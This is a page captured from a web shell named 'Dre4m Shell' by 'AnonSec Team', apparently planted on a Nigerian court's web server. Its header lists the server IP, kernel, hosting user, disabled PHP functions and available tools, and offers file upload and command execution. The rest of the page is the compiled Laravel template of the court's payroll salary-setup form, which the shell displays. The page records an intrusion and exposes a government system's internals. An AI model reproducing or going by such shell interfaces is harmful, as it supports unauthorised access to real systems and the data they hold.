ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 52.15.120.214
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/abe61eeebd1249c2dc4d934cb4f73243cb2c2996.php
<?php $__env->startSection('pageTitle'); ?>
  
<?php $__env->stopSection(); ?>

<style type="text/css">
  .form-control
  {
    font-size: 13px;

  }
  .col-md-12
  {
    padding: 0px 5px;
  }
  .table tr td
  {
    font-size: 13px;
    padding:13px;
    font-family: Verdana, Geneva, sans-serif;
  }
  .rowz
  {
    display: inline-block;
  }
  .table tr th
  {
    padding: 15px;
    font-size: 13px;
    text-transform: uppercase;
    font-family: Verdana, Geneva, sans-serif;
    color: #262626;
    background: #eee;
  }
  .input-lg
  {
    padding: 5px !important;
  }
  fieldset { 
    display: block;
    margin-left: 2px;
    margin-right: 2px;
    padding-top: 0.35em;
    padding-bottom: 0.625em;
    padding-left: 0.75em;
    padding-right: 0.75em;
    border: 2px solid #eee;
}
</style>

<?php $__env->startSection('content'); ?>

 

<div class="box box-default" style="border-top: none; background:#FFF;">
 
</div>

    <div style="margin: 10px 20px;">
      <div align="center">
        <h3><b><?php echo e(strtoupper('NATIONAL INDUSTRIAL COURT OF NIGERIA')); ?></b></h3>
        
      </div>
          
      <br />
      <?php if(count($errors) > 0): ?>
                  <div class="alert alert-danger alert-dismissible" role="alert">
                    <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                      <span aria-hidden="true">&times;</span>
                    </button>
                    <strong>Error!</strong> 
                    <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <p><?php echo e($error); ?></p>
                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                  </div>
                <?php endif; ?> 
    <?php if(session('err')): ?>
      <div class="col-sm-12 alert alert-warning alert-dismissible hidden-print" role="alert">
      <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
      </button>
      <strong>Error!</strong> 
      <?php echo e(session('err')); ?> 
      </div>                        
   <?php endif; ?>
    <?php if(session('msg')): ?>
          <div class="alert alert-success alert-dismissible" role="alert">
            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <strong>Success!</strong> 
            <?php echo e(session('msg')); ?>

          </div>                        
          <?php endif; ?>

  </div>

<div class="box-body" style ="background: #FFF;">

 <form method="post" action="<?php echo e(url('/con-salary/create')); ?>" >
<?php echo e(csrf_field()); ?>




<div class="row" style="padding: 1px 12px; margin-bottom: 10px;">
  <div class="col-md-8 col-md-offset-2" style="background: #eee; padding: 10px 15px">
           
<?php if($CourtInfo->courtstatus==1): ?>
        <div class="col-md-5" style="padding: 1px;">
              <div class="form-group">
                <label>Select Court</label>
                <select name="court" id="court" class="form-control input-lg" style="font-size: 13px;">
                  <option value="">Select Court</option>
                  <?php $__currentLoopData = $courts; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $court): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                   <?php if($court->id == session('court')): ?>
                  <option value="<?php echo e($court->id); ?>" selected="selected"><?php echo e($court->court_name); ?></option>
                  <?php else: ?>
                  <option value="<?php echo e($court->id); ?>" <?php if(old('court') == $court->id): ?> selected <?php endif; ?>><?php echo e($court->court_name); ?></option>
                  <?php endif; ?>
                  <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                </select>
                 
              </div>
            </div>
          <?php else: ?>
            <input type="hidden" id="court" name="court" value="<?php echo e($CourtInfo->courtid); ?>">
          <?php endif; ?>
               <div class="col-md-2" style="padding: 1px;">
                <div class="form-group">
                  <label class="control-label">Employee Type</label>
                 
                    <select class="form-control input-lg" id="employeeType" name="employeeType">
                    
                    <option value="">Select</option>
                    <?php $__currentLoopData = $emptype; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $type): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                  
                     <?php if($type->id == session('employeeType')): ?>
                     <option value="<?php echo e($type->id); ?>" selected="selected" <?php if(old('employeeType') == $type->id): ?> selected <?php endif; ?>><?php echo e($type->employmentType); ?></option>
                     <?php else: ?>
                     <option value="<?php echo e($type->id); ?>" <?php if(old('employeeType') == $type->id): ?> selected <?php endif; ?>><?php echo e($type->employmentType); ?></option>
                     <?php endif; ?>
                      
                      
                      <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </select>
                 
                </div>
              </div>
            <div class="col-md-2" style="font-size: 13px;">
              <div class="form-group">
                <label>Grade</label>
                  <select name="grade" id="grade" class="form-control input-lg">

                  <option value=""></option>
                  
                   <?php for($i=1;$i<=17;$i++): ?>
                   
                     <?php if(session('grade') == $i): ?>
                    <option selected="selected" value="<?php echo e($i); ?>"><?php echo e($i); ?></option>
                     
                     <?php else: ?>
                     <option value="<?php echo e($i); ?>" <?php if(old('grade') == $i): ?> selected <?php endif; ?>><?php echo e($i); ?></option>
                    <?php endif; ?>
                    <?php endfor; ?>
                  
                </select>
              </div>
            </div>
            
            <div class="col-md-2" style="padding: 1px;font-size: 13px;">
              <div class="form-group">
                <label>Step</label>
                  <select name="step" class="form-control input-lg" id="step">

                  <option value=""></option>
                  <?php for($i=1;$i<=17;$i++): ?>
                   
                     <?php if(session('step') == $i): ?>
                    <option selected="selected" value="<?php echo e($i); ?>"><?php echo e($i); ?></option>
                     
                     <?php else: ?>
                     <option value="<?php echo e($i); ?>" <?php if(old('step') == $i): ?> selected <?php endif; ?>><?php echo e($i); ?></option>
                    <?php endif; ?>
                    <?php endfor; ?>
                </select>
                   
              </div>
            </div>
            <div class="col-md-1" style="padding: 1px;">
              <div class="form-group" style="padding-top: 23px;">
                
                <input type="submit" name="submit" id="display" class="btn btn-default input-lg" value="Display" />  
              </div>
            </div>
  </div>
</div>

<!--salary input form -->


<div class="panel">
<div class="form-horizontal">
<?php if(session('verify') == 'update'): ?>
          
            
                <h3 class="text-center">EARNINGS</h3> 
       
              
                 <div class="row">
                 
                  <div class="col-md-4">
                   <label >Basic Salary</label>
                   <input type="text" class="form-control" name="basic" id="" value="<?php if(count($errors) > 0): ?><?php echo e(old('basic')); ?><?php elseif($scale !=''): ?><?php echo e($scale->amount); ?> <?php endif; ?> ">
                   <input type="hidden" class="form-control" name="id" id="" value="<?php if($scale != ''): ?><?php echo e($scale->ID); ?> <?php endif; ?>">
                  </div>
                
               
                
                  <div class="col-md-4">
                   <label>PECULIAR/ALLOWANCE</label>
                    <input type="text" class="form-control popover-button-default" name="peculiar" value="<?php if(count($errors) > 0): ?><?php echo e(old('peculiar')); ?><?php elseif($scale !=''): ?><?php echo e($scale->peculiar); ?> <?php endif; ?>">
                  </div>
                  <!--  <div class="col-md-4">-->
                  <!-- <label>Federal Govt 40%</label>-->
                  <!--  <input type="text" class="form-control popover-button-default" name="percent" value="<?php if(count($errors) > 0): ?><?php echo e(old('percent')); ?><?php elseif($scale !=''): ?><?php echo e($scale->percent); ?> <?php endif; ?>">-->
                  <!--</div>-->
                </div>
                <div class="clearfix"></div> 
                                   
                 
                
                  <br>
                  <h3 class="text-center" style="position: center">DEDUCTIONS</h3>
                  <br>
                   <div class="col-md-4">
                </div>
                <div class="row"> 
                  <div class="col-md-2">
                    <label>Tax</label>
                      <input type="text" class="form-control" name="tax" value="<?php if(count($errors) > 0): ?><?php echo e(old('tax')); ?><?php elseif($scale !=''): ?><?php echo e($scale->tax); ?> <?php endif; ?>">
                    </div>
                  

                  <div class="col-md-2">
                    <label>Pension</label>
                      <input type="text" class="form-control" name="pension" value="<?php if(count($errors) > 0): ?><?php echo e(old('pension')); ?><?php elseif($scale !=''): ?><?php echo e($scale->pension); ?> <?php endif; ?>">
                    </div>
                  
                 		<div class="col-md-4">
                    </div>

                  <div class="col-md-2">
                    <label>NHF</label>
                      <input type="text" class="form-control" name="nhf" value="<?php if(count($errors) > 0): ?><?php echo e(old('nhf')); ?><?php elseif($scale !=''): ?><?php echo e($scale->nhf); ?> <?php endif; ?>">
                    </div>
                  

                  <div class="col-md-2">
                    <label>Union Dues</label>
                      <input type="text" class="form-control" name="unionDues" value="<?php if(count($errors) > 0): ?><?php echo e(old('unionDues')); ?><?php elseif($scale !=''): ?><?php echo e($scale->unionDues); ?> <?php endif; ?>">
                    </div>
                   </div>
                 
                    </br>
                   <div class="col-md-2" style="text-align: center; margin-left:0px auto;">
                     <input type="submit" class="btn btn-success" id="btn" name="submit" value="Update">
                   </div>
               

  <?php endif; ?>              
                
  
<?php if(session('verify') == 'add_new'): ?>
 
     
         <h3 class="text-center">EARNINGS</h3>  
          
            <div class="col-md-1">
            </div>
            <div class="row">
                <div class="col-md-6">
                  <label>Basic Salary</label>
                    <input type="text" class="form-control" name="basic" id="" value="<?php echo e(old('basic')); ?>">
                    <input type="hidden" class="form-control" name="id" id="">
                </div>
               
                
                <div class="col-md-6">
                  <label>PECULIAR/ALLOWANCE</label>
                    <input type="text" class="form-control popover-button-default" name="peculiar" value="<?php echo e(old('peculiar')); ?>">
                </div>
                
                </div>
              <div class="clearfix"></div> 
                  <br>
                <h3 class="text-center">DEDUCTIONS</h3>
                  <br>
              <div class="col-md-4">
                </div>    
               <div class="row">
                 <div class="col-md-2 col-lg-2">
                   <label>Tax</label>
                     <input type="text" class="form-control" name="tax" value="<?php echo e(old('tax')); ?>">
                  </div>
                

                <div class="col-md-2 col-lg-2">
                  <label>Pension</label>
                    <input type="text" class="form-control" name="pension" value="<?php echo e(old('pension')); ?>">
                  </div>
                
                <div class="col-md-4">
                </div>

                <div class="col-md-2 col-lg-2">
                  <label>NHF</label>
                    <input type="text" class="form-control" name="nhf" value="<?php echo e(old('pension')); ?>">
                  </div>
                

                <div class="col-md-2 col-lg-2">
                  <label>Union Dues</label>
                    <input type="text" class="form-control" name="unionDues" value="<?php echo e(old('unionDues')); ?>">
                  </div>
             </div>   
                </br>
                 <div class="col-md-2" style="text-align: center; margin-left:0px auto;">
                    <input type="submit" class="btn btn-success" id="btn" name="submit" value="Submit">
                 </div>
            
                

  
  <?php endif; ?>

   </div>
   </div>
<!-- end salary input form -->

</form>
</div><!-- end box-body-->

<?php $__env->stopSection(); ?>


<?php $__env->startSection('scripts'); ?>
<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>
<!-- autocomplete js-->
<script src="<?php echo e(asset('assets/js/jquery.autocomplete.min.js')); ?>" ></script>
<script src="<?php echo e(asset('assets/js/my-hr.js')); ?>" type="text/javascript"></script>
<script type="text/javascript">


   $(document).ready(function(){
   //$('#salary').hide();
    $("#salary").click(function(){
    // $('#display').show();
    // $('#salary').show();
    });
});


  $(function() {
      $("#staffNo").autocomplete({
        serviceUrl: murl + '/report/search',
        minLength: 10,
        onSelect: function (suggestion) {
            $('#fileNo').val(suggestion.data);
           
        }
      });
  });

  $("#searchDate").datepicker({
    changeMonth: true,
    changeYear: true,
    yearRange: '1910:2090', // specifying a hard coded year range
    showOtherMonths: true,
    selectOtherMonths: true,
    dateFormat: "dd MM, yy",
    onSelect: function(dateText, inst){
      var theDate = new Date(Date.parse($(this).datepicker('getDate')));
      var dateFormatted = $.datepicker.formatDate('yy-mm-d', theDate);
       $('#fileNo').val($.datepicker.formatDate('yy-m-d', theDate));
    },
  });

</script>


<script type="text/javascript">
 (function () {
  $('#court').change( function(){
    //$('#processing').text('Processing. Please wait...');
    $.ajax({
      url: murl +'/new-staff/getcourt',
      type: "post",
      data: {'courtID': $('#court').val(), '_token': $('input[name=_token]').val()},

      success: function(data){
      
    $('#division').empty(); 
     $('#division').append( '<option value="">Select Division</option>')
        $.each(data, function(index, obj){
        $('#division').append( '<option value="'+obj.divisionID+'">'+obj.division+'</option>');
        });
        
      }
    })  
  });}) ();


 (function () {
  $('#court').change( function(){
    //$('#processing').text('Processing. Please wait...');
    $.ajax({
      url: murl +'/new-staff/getdepartments',
      type: "post",
      data: {'courtID': $('#court').val(), '_token': $('input[name=_token]').val()},

      success: function(data){
     
    $('#dept').empty(); 
        $('#dept').append( '<option value="">Select Section</option>' );
        $.each(data, function(index, obj){
        $('#dept').append( '<option value="'+obj.id+'">'+obj.department+'</option>' );
        });
        
      }
    })  
  });}) ();


</script>

<script type="text/javascript">
  $(document).ready(function(){
  
$("#court").on('change',function(){
  var id = $(this).val();

  $token = $("input[name='_token']").val();
 $.ajax({
  headers: {'X-CSRF-TOKEN': $token},
  url: "<?php echo e(url('/court/setsession')); ?>",

  type: "post",
  data: {'courtID':id},
  success: function(data){
  
  }
});

   

});
 });



  $(function(){
  $('.form-control').bind('input', function(){
    $(this).val(function(_, v){
     return v.replace(/\s+/g, '');
    });
  });
});
</script> 

<script type="text/javascript">
$(document).ready(function()
{

$("#court").on('change',function(){
$("#btn").prop('disabled', true);
  });
  $("#employeeType").on('change',function(){
$("#btn").prop('disabled', true);
  });
  $("#grade").on('change',function(){
$("#btn").prop('disabled', true);
  });
  $("#step").on('change',function(){
$("#btn").prop('disabled', true);
  });


  $('#display').click(function()
  {
     $("#btn").prop('disabled', false);
  });

});
</script>


<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
  <link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/custom-style.css')); ?>">

  <link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/payroll/consalarySetup/createSalary.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team